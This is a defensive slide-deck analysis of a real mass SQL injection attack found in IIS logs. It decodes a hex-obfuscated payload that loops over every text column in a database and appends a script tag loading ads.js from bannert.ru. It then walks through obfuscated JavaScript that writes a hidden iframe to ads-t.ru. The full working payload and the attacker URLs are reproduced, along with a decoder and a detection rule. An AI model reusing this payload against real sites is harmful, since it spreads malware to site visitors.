SQL Injection Attack Overview
SQL Injection Attack
Overview
Step by step analysis of a SQL Injection attack
Code Obfuscation a Definition
IIS Log Entry
Decoding the HEX Part 1
SQL Injection Code
Decoding the HEX Part 2
Injected Code
Where is this coming from?
Code Obfuscation a Definition
“Obfuscated code is source or machine code
that has been made difficult to understand.
Programmers may deliberately obfuscate code
to conceal its purpose (a form of security
through obscurity), to deter reverse
engineering, or as a puzzle or recreational
challenge for readers. Programs known as
obfuscators transform human-readable code
into obfuscated code using various techniques.”
-Wikipedia
This is the IIS log entry that is generated during the attack. In the next slide we remove the URL encoding and make the highlighted portion of the request (the hex payload) more readable.
IIS Log Entry
\\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1
GET /client/file.asp adid=24&category=Texas+03-
04%2F08;DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x4445436C41724520405420
5641524348617228323535292C406320566152436861522832353529206445636C4172652074614
24C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E6
16D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726
520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E587479506
53D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E5
8745970453D31363729204F70456E207441426C455F435552734F72204645746348204E65787420
46726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C452840404645
5463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B
275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834
303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230
3733373236333344363837343734373033413246324637373737373732453632363136453645363
5373237343245373237353246363136343733324536413733334533433246373336333732363937
3037343345206173207641524348417228353129292729204665746348204E6558742046524F4D2
05441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C45
5F437572736F72206445414C6C4F63415445205441424C655F435552736F5220%20aS%20varcH
Ar(4000));exEc(@S);-- 80 - 123.204.243.229 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -
www.domain.com 200 0 0 13542 1641 1015
After removing the URL encoding and adding some line feeds we have the following code. The CAST statement converts the hex string from the log into a variable character field (varchar). Next the EXEC command executes this decoded string.
IIS Log Entry - Removing URL Encoding
/client/file.asp
adid=24&category=Texas 03-04/08;
DECLARE @s VaRcHAr(4000);
SET @S=casT(
0x4445436C417245204054205641524348617228323535292C40632056615243686152283235352
9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374
20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C
554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720
614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950
653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72
204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406
3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570
64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657
27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333
6333732363937303734323037333732363333443638373437343730334132463246373737373737
3245363236313645364536353732373432453732373532463631363437333245364137333345334
3324637333633373236393730373433452061732076415243484172283531292927292046657463
48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442
0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552
736F5220 aS varcHAr(4000));
exEc(@S);
CAST: Translates the HEX expression into a character string
EXEC: Executes this string
Here we decode the encoded HEX string into its ASCII equivalent. The query selects all user defined tables and then limits it to columns with datatypes that can hold a string of characters. It then loops through each of the columns and appends the entire injected string to it, so the attack applies to every row. We look at this code further in the next slide.
The query in the encoded HEX uses an interesting trick to attack SQL Server by using sysobjects and syscolumns, special tables within SQL Server.
I'd like to point out that the code is somewhat dynamic in nature. You can see a variety of upper and lower case characters in the code. This is an attempt to avoid detection, and all of these vary significantly from attack to attack.
Decoding the HEX part 1
0x4445436C41724520405420564152434861 …
0x44 = 68 = D
0x45 = 69 = E
0x43 = 67 = C
0x6C = 108 = l
0x41 = 65 = A
0x72 = 114 = r
0x45 = 69 = E
0x20 = 32 = (space)
0x40 = 64 = @
0x54 = 84 = T
0x20 = 32 = (space)
0x56 = 86 = V
0x41 = 65 = A
0x52 = 82 = R
0x43 = 67 = C
0x48 = 72 = H
0x61 = 97 = a
DEClArE @T VARCHar(255),@c VaRChaR(255)
dEclAre taBLe_cuRsoR CURSoR
fOr SElECt A.name,b.name FroM sysobjECts a, sYsCOlUMns b
where A.Id=b.id aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167)
OpEn tABlE_CURsOr
FEtcH Next From tAbLe_CUrsOR INTo @T,@c
whilE(@@FETch_STAtUS=0)
Begin
ExEc('UpdaTe ['+@T+']
SEt ['+@C+']=
RTRiM(COnVert(VArCHAR(4000),['+@C+']))+
CAST(0X3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
as vARCHAr(51))')
FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C
EnD
ClOse TAbLE_Cursor
dEALlOcATE TABLe_CURsoR
sysobjects: Contains one row for each object (constraint, default, log, rule, stored procedure, and so on) created within a database.
syscolumns: Contains one row for every column in every table and view, and a row for each parameter in a stored procedure. This table is in each database.
XType in sysobjects: U = User table
XType in syscolumns (the column's system type id): 35 = text, 99 = ntext, 167 = varchar, 231 = nvarchar
Using the same method as before we can very easily determine that the injected string is a script tag pointing to ads.js. I have also experienced changes to this URL from attack to attack. I have decoded about four different locations for ads.js as of this writing.
Decoding the HEX part 2
0x3C736372697074207372633D687474703A2F2F7777772E626
16E6E6572742E72752F6164732E6A733E3C2F7363726970743E
<script src=http://www.bannert.ru/ads.js></script>
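To make the decoding shown on the two "Decoding the HEX" slides repeatable, here is an added example (my own code, not part of the original presentation) that takes the query string from the IIS log entry above, removes the URL encoding, decodes the CAST hex literal and then looks inside the result for a further hex literal, which recovers the script tag. It also carries a simple triage check for this attack family that matches the keywords case-insensitively, so the mixed-case trick does not help the attacker. The query string is reassembled from the log entry on the earlier slide; the 64-digit threshold and the keyword set are my choices.

```python
import re
from urllib.parse import unquote_plus

# Hex literal copied from the IIS log entry on the earlier slide (line breaks removed).
HEX_PAYLOAD = (
    "4445436C417245204054205641524348617228323535292C40632056615243686152283235352"
    "9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374"
    "20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C"
    "554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720"
    "614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950"
    "653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72"
    "204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406"
    "3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570"
    "64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657"
    "27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333"
    "6333732363937303734323037333732363333443638373437343730334132463246373737373737"
    "3245363236313645364536353732373432453732373532463631363437333245364137333345334"
    "3324637333633373236393730373433452061732076415243484172283531292927292046657463"
    "48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442"
    "0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552"
    "736F5220"
)

# The cs-uri-query field as IIS logged it, reassembled from that log entry.
SAMPLE_QUERY = (
    "adid=24&category=Texas+03-04%2F08;DECLARE%20@s%20VaRcHAr(4000);"
    "SET%20@S=casT(0x" + HEX_PAYLOAD + "%20aS%20varcHAr(4000));exEc(@S);--"
)

HEX_LITERAL = re.compile(r"0[xX]((?:[0-9A-Fa-f]{2})+)")
SQL_KEYWORD = re.compile(r"\b(declare|cast|exec)\b", re.IGNORECASE)


def hex_to_text(hexdigits):
    """What CAST(0x... AS VARCHAR) does on the server: raw bytes read as single-byte characters."""
    return bytes.fromhex(hexdigits).decode("latin-1")


def decode_layers(raw_query):
    """URL-decode the query, then peel every hex literal found at each layer until none remain.

    Returns [decoded query, first payload, payload hidden inside that payload, ...].
    """
    layers = [unquote_plus(raw_query)]
    frontier = layers[:]
    while frontier:
        nxt = []
        for text in frontier:
            for m in HEX_LITERAL.finditer(text):
                decoded = hex_to_text(m.group(1))
                layers.append(decoded)
                nxt.append(decoded)
        frontier = nxt
    return layers


def looks_like_hex_sqli(raw_query, min_hex_digits=64):
    """Triage rule (my assumption, not the presentation's): a long hex literal plus CAST and EXEC
    in one query string, matched case-insensitively."""
    q = unquote_plus(raw_query)
    long_hex = any(len(m.group(1)) >= min_hex_digits for m in HEX_LITERAL.finditer(q))
    keywords = {k.lower() for k in SQL_KEYWORD.findall(q)}
    return long_hex and {"cast", "exec"} <= keywords


if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(SAMPLE_QUERY)):
        print(f"--- layer {depth} ---\n{layer[:120]}")
    print("flagged:", looks_like_hex_sqli(SAMPLE_QUERY))
```

Layer 1 is the cursor loop from the "Decoding the HEX part 1" slide and layer 2 is the script tag from part 2; the loop keeps going because the attacker can nest literals as deep as they like.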
Since most of the code within ads.js is not utilized I'll stick with what is. The first part is an interesting way of hiding the write command. They utilize the replace function to remove the 5 from within the string literal, concealing it from detection. The two functions within the write statement are very similar so I will only explain one of them, but I will indicate where their differences are.
Injected Code – Java Script
<script src=http://www.bannert.ru/ads.js></script>
document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
Once the replace has removed the 5, this is equivalent to:
write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq'));
The first part of this function sets up some variables. These variables are the only differences between the two functions. The first two are a decryption key and the last is the cipher text. The next step is for the code to set up an array based on the cipher text split on the commas. It then loops through each of these elements and splits it once again, however on the plus sign. For example the first array element would be 90+0. It then performs the decryption mathematics and determines the resultant string.
Injected Code – Java Script
Decoded output (as shown on the slide):
<iframe width=1 height=1 border=0 frameborder=0 s
function RfCEPXiV(KDZJF){
var Ffwx=6,
TMplSKEfAW=4;
var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2,150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2,73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0,145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2,171+0,',
QlnGAowZ=VhoWIRnEH.split(','); // Splits the string at the commas
gHuP='';
for(THLfo=0;THLfo<QlnGAowZ.length-1;THLfo++)
{
MhbtCwq=QlnGAowZ[THLfo].split('+'); // Splits the string at the plus
gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]);
gAJys = parseInt(gAJys)/Ffwx;
gHuP += String.fromCharCode(gAJys);
}
return gHuP;}
Working the first elements by hand:
90*4 + 0 = 360    360/6 = 60    60 = <
157*4 + 2 = 630   630/6 = 105   105 = i
153*4 + 0 = 612   612/6 = 102   102 = f
171*4 + 0 = 684   684/6 = 114   114 = r
145*4 + 2 = 582   582/6 = 97    97 = a
…
The results from both functions together form an iframe which loads index.php. At this point I stopped my investigation, partly because the index.php file returned a Page Not Found error. As noted below there are three possible conditions at this point.
Injected Code – php & css
<iframe width=1 height=1 border=0 frameborder=0 src='http://ads-t.ru/ad/index.php'></iframe>
Index.php simulates an 'Error 404 - Page Not Found' however it has custom Java Script as well as a cascading style sheet which specifies background images.
One of three conditions exists:
This site has been identified as malicious and has been removed from the hosting provider.
The images specified in the CSS could be malicious in nature.
They have not activated the malicious code and could do so at any time.
By performing a WhoIs on the source IP address identified in the IIS logs I was able to determine that this particular attack originated from Taiwan. The IP addresses for other attacks varied in origin, however so far all have originated from Asia.
After some communications with the Internet Storm Center the handlers at the ISC actually provided a link to a site diary entry for this attack from April 16, 2008 (click here to see it). They have the code (apparently written in Chinese) that utilizes Google to identify sites that are vulnerable to this attack: the program performs a Google search for a string that would indicate a vulnerable site and then executes the attack against them.
Where is this coming from?
123.204.243.229
inetnum: 123.204.0.0 - 123.205.255.255
netname: SEEDNET-NET
descr: Digital United Inc.
descr: 7F,220,gangchi road
descr: Taipei Taiwan 114
country: TW
admin-c: MC37-AP
tech-c: MC37-AP
status: ALLOCATED PORTABLE
notify: michaelc@du.net.tw
mnt-by: MAINT-TW-TWNIC
mnt-lower: MAINT-TW-TWNIC
mnt-routes: MAINT-TW-TWNIC
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20061228
source: APNIC
Thank you for watching
Fred Stuck